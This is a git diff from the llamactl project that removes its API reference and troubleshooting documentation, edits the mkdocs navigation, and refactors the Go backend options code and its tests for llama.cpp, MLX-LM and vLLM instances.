GET /api/v1/version
```
**Response:**
```
Version: 1.0.0
Commit: abc123
Build Time: 2024-01-15T10:00:00Z
```
### Get Llama Server Help
Get help text for the llama-server command.
```http
GET /api/v1/server/help
```
**Response:** Plain text help output from `llama-server --help`
### Get Llama Server Version
Get version information of the llama-server binary.
```http
GET /api/v1/server/version
```
**Response:** Plain text version output from `llama-server --version`
### List Available Devices
List available devices for llama-server.
```http
GET /api/v1/server/devices
```
**Response:** Plain text device list from `llama-server --list-devices`
## Instances
### List All Instances
Get a list of all instances.
```http
GET /api/v1/instances
```
**Response:**
```json
[
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
]
```
### Get Instance Details
Get detailed information about a specific instance.
```http
GET /api/v1/instances/{name}
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Create Instance
Create and start a new instance.
```http
POST /api/v1/instances/{name}
```
**Request Body:** JSON object with instance configuration. Common fields include:
- `backend_type`: Backend type (`llama_cpp`, `mlx_lm`, or `vllm`)
- `backend_options`: Backend-specific configuration
- `auto_restart`: Enable automatic restart on failure
- `max_restarts`: Maximum restart attempts
- `restart_delay`: Delay between restarts in seconds
- `on_demand_start`: Start instance when receiving requests
- `idle_timeout`: Idle timeout in minutes
- `environment`: Environment variables as key-value pairs
See [Managing Instances](managing-instances.md) for complete configuration options.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Update Instance
Update an existing instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
```http
PUT /api/v1/instances/{name}
```
**Request Body:** JSON object with configuration fields to update.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Delete Instance
Stop and remove an instance.
```http
DELETE /api/v1/instances/{name}
```
**Response:** `204 No Content`
## Instance Operations
### Start Instance
Start a stopped instance.
```http
POST /api/v1/instances/{name}/start
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
**Error Responses:**
- `409 Conflict`: Maximum number of running instances reached
- `500 Internal Server Error`: Failed to start instance
### Stop Instance
Stop a running instance.
```http
POST /api/v1/instances/{name}/stop
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "stopped",
"created": 1705312200
}
```
### Restart Instance
Restart an instance (stop then start).
```http
POST /api/v1/instances/{name}/restart
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Get Instance Logs
Retrieve instance logs.
```http
GET /api/v1/instances/{name}/logs
```
**Query Parameters:**
- `lines`: Number of lines to return (default: all lines, use -1 for all)
**Response:** Plain text log output
**Example:**
```bash
curl "http://localhost:8080/api/v1/instances/my-instance/logs?lines=100"
```
### Proxy to Instance
Proxy HTTP requests directly to the llama-server instance.
```http
GET /api/v1/instances/{name}/proxy/*
POST /api/v1/instances/{name}/proxy/*
```
This endpoint forwards all requests to the underlying llama-server instance running on its configured port. The proxy strips the `/api/v1/instances/{name}/proxy` prefix and forwards the remaining path to the instance.
**Example - Check Instance Health:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/proxy/health
```
This forwards the request to `http://instance-host:instance-port/health` on the actual llama-server instance.
**Error Responses:**
- `503 Service Unavailable`: Instance is not running
## OpenAI-Compatible API
Llamactl provides OpenAI-compatible endpoints for inference operations.
### List Models
List all instances in OpenAI-compatible format.
```http
GET /v1/models
```
**Response:**
```json
{
"object": "list",
"data": [
{
"id": "llama2-7b",
"object": "model",
"created": 1705312200,
"owned_by": "llamactl"
}
]
}
```
### Chat Completions, Completions, Embeddings
All OpenAI-compatible inference endpoints are available:
```http
POST /v1/chat/completions
POST /v1/completions
POST /v1/embeddings
POST /v1/rerank
POST /v1/reranking
```
**Request Body:** Standard OpenAI format with `model` field specifying the instance name
**Example:**
```json
{
"model": "llama2-7b",
"messages": [
{
"role": "user",
"content": "Hello, how are you?"
}
]
}
```
The server routes requests to the appropriate instance based on the `model` field in the request body. Instances with on-demand starting enabled will be automatically started if not running. For configuration details, see [Managing Instances](managing-instances.md).
**Error Responses:**
- `400 Bad Request`: Invalid request body or missing instance name
- `503 Service Unavailable`: Instance is not running and on-demand start is disabled
- `409 Conflict`: Cannot start instance due to maximum instances limit
## Instance Status Values
Instances can have the following status values:
- `stopped`: Instance is not running
- `running`: Instance is running and ready to accept requests
- `failed`: Instance failed to start or crashed
## Error Responses
All endpoints may return error responses in the following format:
```json
{
"error": "Error message description"
}
```
### Common HTTP Status Codes
- `200`: Success
- `201`: Created
- `204`: No Content (successful deletion)
- `400`: Bad Request (invalid parameters or request body)
- `401`: Unauthorized (missing or invalid API key)
- `403`: Forbidden (insufficient permissions)
- `404`: Not Found (instance not found)
- `409`: Conflict (instance already exists, max instances reached)
- `500`: Internal Server Error
- `503`: Service Unavailable (instance not running)
## Examples
### Complete Instance Lifecycle
```bash
# Create and start instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/models/llama-2-7b.gguf",
"gpu_layers": 32
},
"environment": {
"CUDA_VISIBLE_DEVICES": "0",
"OMP_NUM_THREADS": "8"
}
}'
# Check instance status
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
# Get instance logs
curl -H "Authorization: Bearer your-api-key" \
"http://localhost:8080/api/v1/instances/my-model/logs?lines=50"
# Use OpenAI-compatible chat completions
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-inference-api-key" \
-d '{
"model": "my-model",
"messages": [
{"role": "user", "content": "Hello!"}
],
"max_tokens": 100
}'
# Stop instance
curl -X POST -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/stop
# Delete instance
curl -X DELETE -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
```
### Using the Proxy Endpoint
You can also directly proxy requests to the llama-server instance:
```bash
# Direct proxy to instance (bypasses OpenAI compatibility layer)
curl -X POST http://localhost:8080/api/v1/instances/my-model/proxy/completion \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"prompt": "Hello, world!",
"n_predict": 50
}'
```
## Backend-Specific Endpoints
### Parse Commands
Llamactl provides endpoints to parse command strings from different backends into instance configuration options.
#### Parse Llama.cpp Command
Parse a llama-server command string into instance options.
```http
POST /api/v1/backends/llama-cpp/parse-command
```
**Request Body:**
```json
{
"command": "llama-server -m /path/to/model.gguf -c 2048 --port 8080"
}
```
**Response:**
```json
{
"backend_type": "llama_cpp",
"llama_server_options": {
"model": "/path/to/model.gguf",
"ctx_size": 2048,
"port": 8080
}
}
```
#### Parse MLX-LM Command
Parse an MLX-LM server command string into instance options.
```http
POST /api/v1/backends/mlx/parse-command
```
**Request Body:**
```json
{
"command": "mlx_lm.server --model /path/to/model --port 8080"
}
```
**Response:**
```json
{
"backend_type": "mlx_lm",
"mlx_server_options": {
"model": "/path/to/model",
"port": 8080
}
}
```
#### Parse vLLM Command
Parse a vLLM serve command string into instance options.
```http
POST /api/v1/backends/vllm/parse-command
```
**Request Body:**
```json
{
"command": "vllm serve /path/to/model --port 8080"
}
```
**Response:**
```json
{
"backend_type": "vllm",
"vllm_server_options": {
"model": "/path/to/model",
"port": 8080
}
}
```
**Error Responses for Parse Commands:**
- `400 Bad Request`: Invalid request body, empty command, or parse error
- `500 Internal Server Error`: Encoding error
## Auto-Generated Documentation
The API documentation is automatically generated from code annotations using Swagger/OpenAPI. To regenerate the documentation:
1. Install the swag tool: `go install github.com/swaggo/swag/cmd/swag@latest`
2. Generate docs: `swag init -g cmd/server/main.go -o apidocs`
## Swagger Documentation
If swagger documentation is enabled in the server configuration, you can access the interactive API documentation at:
```
http://localhost:8080/swagger/
```
This provides a complete interactive interface for testing all API endpoints.

View File

@@ -1,160 +0,0 @@
# Troubleshooting
Issues specific to Llamactl deployment and operation.
## Configuration Issues
### Invalid Configuration
**Problem:** Invalid configuration preventing startup
**Solutions:**
1. Use minimal configuration:
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8000, 9000]
```
2. Check data directory permissions:
```bash
# Ensure data directory is writable (default: ~/.local/share/llamactl)
mkdir -p ~/.local/share/llamactl/{instances,logs}
```
## Instance Management Issues
### Model Loading Failures
**Problem:** Instance fails to start with model loading errors
**Common Solutions:**
- **llama-server not found:** Ensure `llama-server` binary is in PATH
- **Wrong model format:** Ensure model is in GGUF format
- **Insufficient memory:** Use smaller model or reduce context size
- **Path issues:** Use absolute paths to model files
### Memory Issues
**Problem:** Out of memory errors or system becomes unresponsive
**Solutions:**
1. **Reduce context size:**
```json
{
"n_ctx": 1024
}
```
2. **Use quantized models:**
- Try Q4_K_M instead of higher precision models
- Use smaller model variants (7B instead of 13B)
### GPU Configuration
**Problem:** GPU not being used effectively
**Solutions:**
1. **Configure GPU layers:**
```json
{
"n_gpu_layers": 35
}
```
### Advanced Instance Issues
**Problem:** Complex model loading, performance, or compatibility issues
Since llamactl uses `llama-server` under the hood, many instance-related issues are actually llama.cpp issues. For advanced troubleshooting:
**Resources:**
- **llama.cpp Documentation:** [https://github.com/ggml/llama.cpp](https://github.com/ggml/llama.cpp)
- **llama.cpp Issues:** [https://github.com/ggml/llama.cpp/issues](https://github.com/ggml/llama.cpp/issues)
- **llama.cpp Discussions:** [https://github.com/ggml/llama.cpp/discussions](https://github.com/ggml/llama.cpp/discussions)
**Testing directly with llama-server:**
```bash
# Test your model and parameters directly with llama-server
llama-server --model /path/to/model.gguf --port 8081 --n-gpu-layers 35
```
This helps determine if the issue is with llamactl or with the underlying llama.cpp/llama-server.
## API and Network Issues
### CORS Errors
**Problem:** Web UI shows CORS errors in browser console
**Solutions:**
1. **Configure allowed origins:**
```yaml
server:
allowed_origins:
- "http://localhost:3000"
- "https://yourdomain.com"
```
## Authentication Issues
**Problem:** API requests failing with authentication errors
**Solutions:**
1. **Disable authentication temporarily:**
```yaml
auth:
require_management_auth: false
require_inference_auth: false
```
2. **Configure API keys:**
```yaml
auth:
management_keys:
- "your-management-key"
inference_keys:
- "your-inference-key"
```
3. **Use correct Authorization header:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances
```
## Debugging and Logs
### Viewing Instance Logs
```bash
# Get instance logs via API
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
### Enable Debug Logging
```bash
export LLAMACTL_LOG_LEVEL=debug
llamactl
```
## Getting Help
When reporting issues, include:
1. **System information:**
```bash
llamactl --version
```
2. **Configuration file** (remove sensitive keys)
3. **Relevant log output**
4. **Steps to reproduce the issue**

View File

@@ -25,8 +25,8 @@ theme:
name: Switch to light mode
features:
- navigation.tabs
- navigation.sections
- navigation.expand
- navigation.tabs.sticky
- toc.integrate
- navigation.top
- search.highlight
- search.share
@@ -49,14 +49,12 @@ markdown_extensions:
nav:
- Home: index.md
- Getting Started:
- Installation: getting-started/installation.md
- Quick Start: getting-started/quick-start.md
- Configuration: getting-started/configuration.md
- User Guide:
- Managing Instances: user-guide/managing-instances.md
- API Reference: user-guide/api-reference.md
- Troubleshooting: user-guide/troubleshooting.md
- Installation: installation.md
- Quick Start: quick-start.md
- Configuration: configuration.md
- Managing Instances: managing-instances.md
- API Reference: api-reference.md
- Troubleshooting: troubleshooting.md
plugins:
- search
@@ -66,9 +64,12 @@ plugins:
css_dir: css
javascript_dir: js
canonical_version: null
- neoteroi.mkdocsoad:
use_pymdownx: true
hooks:
- docs/readme_sync.py
- docs/fix_line_endings.py
extra:
version:
@@ -77,3 +78,6 @@ extra:
social:
- icon: fontawesome/brands/github
link: https://github.com/lordmathis/llamactl
extra_css:
- css/css-v1.1.3.css

View File

@@ -1,10 +1,254 @@
package backends
import (
"encoding/json"
"fmt"
"llamactl/pkg/config"
"llamactl/pkg/validation"
"maps"
)
// BackendType identifies which inference backend an instance runs on. Its
// string value is what appears in the "backend_type" JSON field.
type BackendType string
// Supported backend types.
const (
BackendTypeLlamaCpp BackendType = "llama_cpp"
BackendTypeMlxLm BackendType = "mlx_lm"
BackendTypeVllm BackendType = "vllm"
// BackendTypeMlxVlm BackendType = "mlx_vlm" // Future expansion
)
// backend is the contract every backend-specific options struct fulfils so
// that Options can delegate to it without knowing the concrete type.
type backend interface {
// BuildCommandArgs returns the arguments used when the backend runs natively.
BuildCommandArgs() []string
// BuildDockerArgs returns the arguments used when the backend runs in Docker.
BuildDockerArgs() []string
// GetPort returns the port stored in the options.
GetPort() int
// SetPort stores the given port in the options.
SetPort(int)
// GetHost returns the host stored in the options.
GetHost() string
// Validate checks the options and returns an error when they are invalid.
Validate() error
// ParseCommand parses a backend command string into backend options.
ParseCommand(string) (any, error)
}
// backendConstructors maps each supported backend type to a factory that
// returns a fresh, zero-valued options struct for that backend. A backend
// type without an entry here is rejected by Options.UnmarshalJSON when
// backend options are supplied.
var backendConstructors = map[BackendType]func() backend{
BackendTypeLlamaCpp: func() backend { return &LlamaServerOptions{} },
BackendTypeMlxLm: func() backend { return &MlxServerOptions{} },
BackendTypeVllm: func() backend { return &VllmServerOptions{} },
}
// Options holds the backend selection and backend configuration of an
// instance. On the wire only backend_type and backend_options exist; the
// typed fields are excluded from JSON and are filled from backend_options by
// UnmarshalJSON.
type Options struct {
// BackendType selects which backend the options apply to.
BackendType BackendType `json:"backend_type"`
// BackendOptions is the generic JSON form of the backend configuration.
BackendOptions map[string]any `json:"backend_options,omitempty"`
// Backend-specific options; at most the one matching BackendType is
// consulted by getBackend.
LlamaServerOptions *LlamaServerOptions `json:"-"`
MlxServerOptions *MlxServerOptions `json:"-"`
VllmServerOptions *VllmServerOptions `json:"-"`
}
// UnmarshalJSON decodes backend_type and backend_options and, when
// backend_options is non-null, converts it into the typed options struct
// registered for that backend type.
//
// It returns an error if the JSON is malformed, if backend_options is set for
// a backend type without a registered constructor, or if the options cannot
// be decoded into the typed struct.
func (o *Options) UnmarshalJSON(data []byte) error {
	// Decode through a method-less alias so json.Unmarshal does not call
	// this method again.
	type Alias Options
	wrapper := &struct{ *Alias }{Alias: (*Alias)(o)}
	if err := json.Unmarshal(data, wrapper); err != nil {
		return err
	}

	// Nothing to convert when no backend options were supplied.
	if o.BackendOptions == nil {
		return nil
	}

	newBackend, known := backendConstructors[o.BackendType]
	if !known {
		return fmt.Errorf("unsupported backend type: %s", o.BackendType)
	}
	typed := newBackend()

	// Round-trip the generic map through JSON to populate the typed struct.
	raw, err := json.Marshal(o.BackendOptions)
	if err != nil {
		return fmt.Errorf("failed to marshal backend options: %w", err)
	}
	if err = json.Unmarshal(raw, typed); err != nil {
		return fmt.Errorf("failed to unmarshal backend options: %w", err)
	}

	// Store in the appropriate typed field for backward compatibility.
	o.setBackendOptions(typed)
	return nil
}
// MarshalJSON encodes the options as backend_type plus backend_options, where
// backend_options is regenerated from the typed backend struct selected by
// BackendType.
//
// The receiver is never modified: the output is built from a shallow copy, so
// marshalling the same Options from several goroutines does not write to
// shared state.
//
// It returns an error if the typed backend cannot be encoded or its encoding
// cannot be converted back into a generic map.
func (o *Options) MarshalJSON() ([]byte, error) {
	// Alias has no methods, so marshalling it does not recurse into this
	// method. Converting *o copies the struct instead of aliasing it.
	type Alias Options
	out := Alias(*o)

	if impl := o.getBackend(); impl != nil {
		optionsData, err := json.Marshal(impl)
		if err != nil {
			return nil, fmt.Errorf("failed to marshal backend options: %w", err)
		}

		// Decode into a map owned by this call only; the receiver's map is
		// left untouched.
		fresh := make(map[string]any)
		if err := json.Unmarshal(optionsData, &fresh); err != nil {
			return nil, fmt.Errorf("failed to unmarshal backend options to map: %w", err)
		}
		out.BackendOptions = fresh
	}

	return json.Marshal(out)
}
// setBackendOptions records bcknd in the typed field that matches its
// concrete type. Values of any other type are ignored.
func (o *Options) setBackendOptions(bcknd backend) {
	if llama, ok := bcknd.(*LlamaServerOptions); ok {
		o.LlamaServerOptions = llama
		return
	}
	if mlx, ok := bcknd.(*MlxServerOptions); ok {
		o.MlxServerOptions = mlx
		return
	}
	if vllm, ok := bcknd.(*VllmServerOptions); ok {
		o.VllmServerOptions = vllm
	}
}
// getBackendSettings returns a pointer to the settings in backendConfig that
// belong to this instance's backend type, or nil when the backend type is not
// one of the supported values.
func (o *Options) getBackendSettings(backendConfig *config.BackendConfig) *config.BackendSettings {
	if o.BackendType == BackendTypeLlamaCpp {
		return &backendConfig.LlamaCpp
	}
	if o.BackendType == BackendTypeMlxLm {
		return &backendConfig.MLX
	}
	if o.BackendType == BackendTypeVllm {
		return &backendConfig.VLLM
	}
	return nil
}
// getBackend returns the typed options struct selected by BackendType, or nil
// when the backend type is unsupported or its typed options have not been
// set.
//
// Each pointer is checked before it is converted to the interface: returning
// a nil *LlamaServerOptions (or sibling) directly would produce a non-nil
// interface value, so callers' `backend != nil` checks would pass and the
// following method call would dereference a nil pointer.
func (o *Options) getBackend() backend {
	switch o.BackendType {
	case BackendTypeLlamaCpp:
		if o.LlamaServerOptions != nil {
			return o.LlamaServerOptions
		}
	case BackendTypeMlxLm:
		if o.MlxServerOptions != nil {
			return o.MlxServerOptions
		}
	case BackendTypeVllm:
		if o.VllmServerOptions != nil {
			return o.VllmServerOptions
		}
	}
	return nil
}
// isDockerEnabled reports whether the backend should be launched through
// Docker: the settings must carry a Docker section that is enabled, and the
// backend type must not be MLX.
//
// A nil settings pointer (which getBackendSettings returns for an unsupported
// backend type) is treated as "Docker disabled" instead of being
// dereferenced.
func (o *Options) isDockerEnabled(backend *config.BackendSettings) bool {
	return backend != nil &&
		backend.Docker != nil &&
		backend.Docker.Enabled &&
		o.BackendType != BackendTypeMlxLm
}
// IsDockerEnabled reports whether this instance's backend is configured to
// run through Docker according to backendConfig.
func (o *Options) IsDockerEnabled(backendConfig *config.BackendConfig) bool {
	return o.isDockerEnabled(o.getBackendSettings(backendConfig))
}
// GetCommand returns the executable used to launch the backend: "docker" when
// Docker is enabled for this backend, otherwise the command configured in the
// backend settings.
//
// It returns an empty string when no settings exist for the backend type
// (getBackendSettings returned nil), rather than dereferencing nil.
func (o *Options) GetCommand(backendConfig *config.BackendConfig) string {
	backendSettings := o.getBackendSettings(backendConfig)
	if backendSettings == nil {
		return ""
	}

	if o.isDockerEnabled(backendSettings) {
		return "docker"
	}

	return backendSettings.Command
}
// BuildCommandArgs assembles the argument list for launching the backend.
//
// With Docker enabled the list is: configured Docker args, the Docker image,
// then the backend's Docker args. Otherwise it is the configured backend args
// followed by the backend's native args. A nil slice is returned when no
// backend is available.
func (o *Options) BuildCommandArgs(backendConfig *config.BackendConfig) []string {
	settings := o.getBackendSettings(backendConfig)
	impl := o.getBackend()
	if impl == nil {
		return nil
	}

	var result []string
	if !o.isDockerEnabled(settings) {
		// Native execution: global backend args first, then instance args.
		result = append(result, settings.Args...)
		return append(result, impl.BuildCommandArgs()...)
	}

	// Docker execution: docker args, image, then the backend's own args.
	result = append(result, settings.Docker.Args...)
	result = append(result, settings.Docker.Image)
	return append(result, impl.BuildDockerArgs()...)
}
// BuildEnvironment merges the environment variables for the backend process
// into a new map. Later sources override earlier ones:
//
//  1. the backend settings' environment,
//  2. the Docker environment, only when Docker is enabled for this backend,
//  3. the instance-specific environment passed by the caller.
//
// When no settings exist for the backend type only the caller's environment
// is used. The returned map is always non-nil and never aliases an input.
func (o *Options) BuildEnvironment(backendConfig *config.BackendConfig, environment map[string]string) map[string]string {
	env := map[string]string{}

	// maps.Copy ranges over its source, so nil source maps need no guard.
	if backendSettings := o.getBackendSettings(backendConfig); backendSettings != nil {
		maps.Copy(env, backendSettings.Environment)

		if o.isDockerEnabled(backendSettings) {
			maps.Copy(env, backendSettings.Docker.Environment)
		}
	}

	maps.Copy(env, environment)

	return env
}
// GetPort returns the port of the active backend, or 0 when no backend is
// available.
func (o *Options) GetPort() int {
	if impl := o.getBackend(); impl != nil {
		return impl.GetPort()
	}
	return 0
}
// SetPort stores port on the active backend. It does nothing when no backend
// is available.
func (o *Options) SetPort(port int) {
	impl := o.getBackend()
	if impl == nil {
		return
	}
	impl.SetPort(port)
}
// GetHost returns the host of the active backend, falling back to
// "localhost" when no backend is available.
func (o *Options) GetHost() string {
	if impl := o.getBackend(); impl != nil {
		return impl.GetHost()
	}
	return "localhost"
}
// GetResponseHeaders returns the response headers configured for this
// instance's backend type.
//
// It returns a nil map when no settings exist for the backend type
// (getBackendSettings returned nil) instead of dereferencing nil; a nil map
// is safe to read and range over.
func (o *Options) GetResponseHeaders(backendConfig *config.BackendConfig) map[string]string {
	backendSettings := o.getBackendSettings(backendConfig)
	if backendSettings == nil {
		return nil
	}
	return backendSettings.ResponseHeaders
}
// ValidateInstanceOptions delegates validation to the active backend. When no
// backend is available it returns a validation error naming the backend type.
func (o *Options) ValidateInstanceOptions() error {
	if impl := o.getBackend(); impl != nil {
		return impl.Validate()
	}
	return validation.ValidationError(fmt.Errorf("backend options cannot be nil for backend type %s", o.BackendType))
}

View File

@@ -9,7 +9,7 @@ import (
)
// BuildCommandArgs converts a struct to command line arguments
func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
func BuildCommandArgs(options any, multipleFlags map[string]struct{}) []string {
var args []string
v := reflect.ValueOf(options).Elem()
@@ -28,9 +28,10 @@ func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
continue
}
// Get flag name from JSON tag
flagName := strings.Split(jsonTag, ",")[0]
flagName = strings.ReplaceAll(flagName, "_", "-")
// Get flag name from JSON tag (snake_case)
jsonFieldName := strings.Split(jsonTag, ",")[0]
// Convert to kebab-case for CLI flags
flagName := strings.ReplaceAll(jsonFieldName, "_", "-")
switch field.Kind() {
case reflect.Bool:
@@ -51,7 +52,8 @@ func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
}
case reflect.Slice:
if field.Type().Elem().Kind() == reflect.String && field.Len() > 0 {
if multipleFlags[flagName] {
// Use jsonFieldName (snake_case) for multipleFlags lookup
if _, isMultiValue := multipleFlags[jsonFieldName]; isMultiValue {
// Multiple flags: --flag value1 --flag value2
for j := 0; j < field.Len(); j++ {
args = append(args, "--"+flagName, field.Index(j).String())

View File

@@ -1,32 +1,24 @@
package llamacpp
package backends
import (
"encoding/json"
"llamactl/pkg/backends"
"fmt"
"llamactl/pkg/validation"
"reflect"
"strconv"
)
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
// Used for both parsing (with underscores) and building (with dashes)
var multiValuedFlags = map[string]bool{
// Parsing keys (with underscores)
"override_tensor": true,
"override_kv": true,
"lora": true,
"lora_scaled": true,
"control_vector": true,
"control_vector_scaled": true,
"dry_sequence_breaker": true,
"logit_bias": true,
// Building keys (with dashes)
"override-tensor": true,
"override-kv": true,
"lora-scaled": true,
"control-vector": true,
"control-vector-scaled": true,
"dry-sequence-breaker": true,
"logit-bias": true,
// llamaMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated
// Keys use snake_case as the parser converts kebab-case flags to snake_case before lookup
var llamaMultiValuedFlags = map[string]struct{}{
"override_tensor": {},
"override_kv": {},
"lora": {},
"lora_scaled": {},
"control_vector": {},
"control_vector_scaled": {},
"dry_sequence_breaker": {},
"logit_bias": {},
}
type LlamaServerOptions struct {
@@ -335,11 +327,41 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
return nil
}
// GetPort returns the port stored in the llama-server options.
func (o *LlamaServerOptions) GetPort() int {
return o.Port
}
// SetPort stores port in the llama-server options.
func (o *LlamaServerOptions) SetPort(port int) {
o.Port = port
}
// GetHost returns the host stored in the llama-server options.
func (o *LlamaServerOptions) GetHost() string {
return o.Host
}
// Validate checks the llama-server options. It rejects a nil receiver, runs
// the string-field validation from the validation package over the struct,
// and requires the port to lie within 0-65535.
func (o *LlamaServerOptions) Validate() error {
	if o == nil {
		return validation.ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
	}

	// Reflection-based scan of all string fields for injection patterns.
	stringsErr := validation.ValidateStructStrings(o, "")
	if stringsErr != nil {
		return stringsErr
	}

	// Basic network validation for port.
	portInRange := o.Port >= 0 && o.Port <= 65535
	if !portInRange {
		return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
	}

	return nil
}
// BuildCommandArgs converts InstanceOptions to command line arguments
func (o *LlamaServerOptions) BuildCommandArgs() []string {
// Llama uses multiple flags for arrays by default (not comma-separated)
// Use package-level multiValuedFlags variable
return backends.BuildCommandArgs(o, multiValuedFlags)
// Use package-level llamaMultiValuedFlags variable
return BuildCommandArgs(o, llamaMultiValuedFlags)
}
func (o *LlamaServerOptions) BuildDockerArgs() []string {
@@ -347,19 +369,19 @@ func (o *LlamaServerOptions) BuildDockerArgs() []string {
return o.BuildCommandArgs()
}
// ParseLlamaCommand parses a llama-server command string into LlamaServerOptions
// ParseCommand parses a llama-server command string into LlamaServerOptions
// Supports multiple formats:
// 1. Full command: "llama-server --model file.gguf"
// 2. Full path: "/usr/local/bin/llama-server --model file.gguf"
// 3. Args only: "--model file.gguf --gpu-layers 32"
// 4. Multiline commands with backslashes
func ParseLlamaCommand(command string) (*LlamaServerOptions, error) {
func (o *LlamaServerOptions) ParseCommand(command string) (any, error) {
executableNames := []string{"llama-server"}
var subcommandNames []string // Llama has no subcommands
// Use package-level multiValuedFlags variable
// Use package-level llamaMultiValuedFlags variable
var llamaOptions LlamaServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &llamaOptions); err != nil {
if err := parseCommand(command, executableNames, subcommandNames, llamaMultiValuedFlags, &llamaOptions); err != nil {
return nil, err
}

View File

@@ -1,71 +1,38 @@
package llamacpp_test
package backends_test
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends"
"llamactl/pkg/testutil"
"reflect"
"slices"
"testing"
)
func TestBuildCommandArgs_BasicFields(t *testing.T) {
options := llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
Host: "localhost",
Verbose: true,
CtxSize: 4096,
GPULayers: 32,
}
args := options.BuildCommandArgs()
// Check individual arguments
expectedPairs := map[string]string{
"--model": "/path/to/model.gguf",
"--port": "8080",
"--host": "localhost",
"--ctx-size": "4096",
"--gpu-layers": "32",
}
for flag, expectedValue := range expectedPairs {
if !containsFlagWithValue(args, flag, expectedValue) {
t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args)
}
}
// Check standalone boolean flag
if !contains(args, "--verbose") {
t.Errorf("Expected --verbose flag not found in %v", args)
}
}
func TestBuildCommandArgs_BooleanFields(t *testing.T) {
func TestLlamaCppBuildCommandArgs_BooleanFields(t *testing.T) {
tests := []struct {
name string
options llamacpp.LlamaServerOptions
options backends.LlamaServerOptions
expected []string
excluded []string
}{
{
name: "verbose true",
options: llamacpp.LlamaServerOptions{
options: backends.LlamaServerOptions{
Verbose: true,
},
expected: []string{"--verbose"},
},
{
name: "verbose false",
options: llamacpp.LlamaServerOptions{
options: backends.LlamaServerOptions{
Verbose: false,
},
excluded: []string{"--verbose"},
},
{
name: "multiple booleans",
options: llamacpp.LlamaServerOptions{
options: backends.LlamaServerOptions{
Verbose: true,
FlashAttn: true,
Mlock: false,
@@ -81,13 +48,13 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
args := tt.options.BuildCommandArgs()
for _, expectedArg := range tt.expected {
if !contains(args, expectedArg) {
if !testutil.Contains(args, expectedArg) {
t.Errorf("Expected argument %q not found in %v", expectedArg, args)
}
}
for _, excludedArg := range tt.excluded {
if contains(args, excludedArg) {
if testutil.Contains(args, excludedArg) {
t.Errorf("Excluded argument %q found in %v", excludedArg, args)
}
}
@@ -95,38 +62,8 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
}
}
// TestBuildCommandArgs_NumericFields checks that integer and floating-point
// options are rendered as "--flag value" pairs with the expected textual
// value.
func TestBuildCommandArgs_NumericFields(t *testing.T) {
	opts := llamacpp.LlamaServerOptions{
		Port:        8080,
		Threads:     4,
		CtxSize:     2048,
		GPULayers:   16,
		Temperature: 0.7,
		TopK:        40,
		TopP:        0.9,
	}
	got := opts.BuildCommandArgs()

	wantPairs := []struct{ flag, value string }{
		{"--port", "8080"},
		{"--threads", "4"},
		{"--ctx-size", "2048"},
		{"--gpu-layers", "16"},
		{"--temp", "0.7"},
		{"--top-k", "40"},
		{"--top-p", "0.9"},
	}
	for _, want := range wantPairs {
		if containsFlagWithValue(got, want.flag, want.value) {
			continue
		}
		t.Errorf("Expected %s %s, not found in %v", want.flag, want.value, got)
	}
}
func TestBuildCommandArgs_ZeroValues(t *testing.T) {
options := llamacpp.LlamaServerOptions{
func TestLlamaCppBuildCommandArgs_ZeroValues(t *testing.T) {
options := backends.LlamaServerOptions{
Port: 0, // Should be excluded
Threads: 0, // Should be excluded
Temperature: 0, // Should be excluded
@@ -146,14 +83,14 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
}
for _, excludedArg := range excludedArgs {
if contains(args, excludedArg) {
if testutil.Contains(args, excludedArg) {
t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args)
}
}
}
func TestBuildCommandArgs_ArrayFields(t *testing.T) {
options := llamacpp.LlamaServerOptions{
func TestLlamaCppBuildCommandArgs_ArrayFields(t *testing.T) {
options := backends.LlamaServerOptions{
Lora: []string{"adapter1.bin", "adapter2.bin"},
OverrideTensor: []string{"tensor1", "tensor2", "tensor3"},
DrySequenceBreaker: []string{".", "!", "?"},
@@ -170,15 +107,15 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
for flag, values := range expectedOccurrences {
for _, value := range values {
if !containsFlagWithValue(args, flag, value) {
